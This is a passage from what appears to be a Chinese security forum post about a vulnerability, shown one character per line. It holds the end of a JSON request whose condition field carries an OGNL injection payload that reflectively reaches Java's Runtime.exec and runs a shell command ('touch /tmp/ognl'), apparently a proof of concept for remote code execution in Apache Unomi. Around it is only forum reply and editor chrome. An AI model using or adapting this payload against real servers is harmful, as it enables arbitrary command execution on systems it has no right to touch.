c
l
a
s
s
.
g
e
t
D
e
c
l
a
r
e
d
M
e
t
h
o
d
s
(
)
.
{
^
#
t
h
i
s
.
n
a
m
e
.
e
q
u
a
l
s
(
"
g
e
t
R
u
n
t
i
m
e
"
)
}
[
0
]
)
.
(
#
r
t
o
b
j
=
#
g
e
t
r
u
n
t
i
m
e
m
e
t
h
o
d
.
i
n
v
o
k
e
(
n
u
l
l
,
n
u
l
l
)
)
.
(
#
e
x
e
c
m
e
t
h
o
d
=
#
r
u
n
t
i
m
e
c
l
a
s
s
.
g
e
t
D
e
c
l
a
r
e
d
M
e
t
h
o
d
s
(
)
.
{
?
#
t
h
i
s
.
n
a
m
e
.
e
q
u
a
l
s
(
"
e
x
e
c
"
)
}
.
{
?
#
t
h
i
s
.
g
e
t
P
a
r
a
m
e
t
e
r
s
(
)
[
0
]
.
g
e
t
T
y
p
e
(
)
.
g
e
t
N
a
m
e
(
)
.
e
q
u
a
l
s
(
"
j
a
v
a
.
l
a
n
g
.
S
t
r
i
n
g
"
)
}
.
{
?
#
t
h
i
s
.
g
e
t
P
a
r
a
m
e
t
e
r
s
(
)
.
l
e
n
g
t
h
<
2
}
[
0
]
)
.
(
#
e
x
e
c
m
e
t
h
o
d
.
i
n
v
o
k
e
(
#
r
t
o
b
j
,
"
t
o
u
c
h
/
t
m
p
/
o
g
n
l
"
)
)
"
,
"
c
o
m
p
a
r
i
s
o
n
O
p
e
r
a
t
o
r
"
:
"
e
q
u
a
l
s
"
,
"
p
r
o
p
e
r
t
y
V
a
l
u
e
"
:
"
m
a
l
e
"
}
,
"
t
y
p
e
"
:
"
p
r
o
f
i
l
e
P
r
o
p
e
r
t
y
C
o
n
d
i
t
i
o
n
"
}
}
]
}
]
}
]
,
"
s
e
s
s
i
o
n
I
d
"
:
"
s
a
m
p
l
e
"
}
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞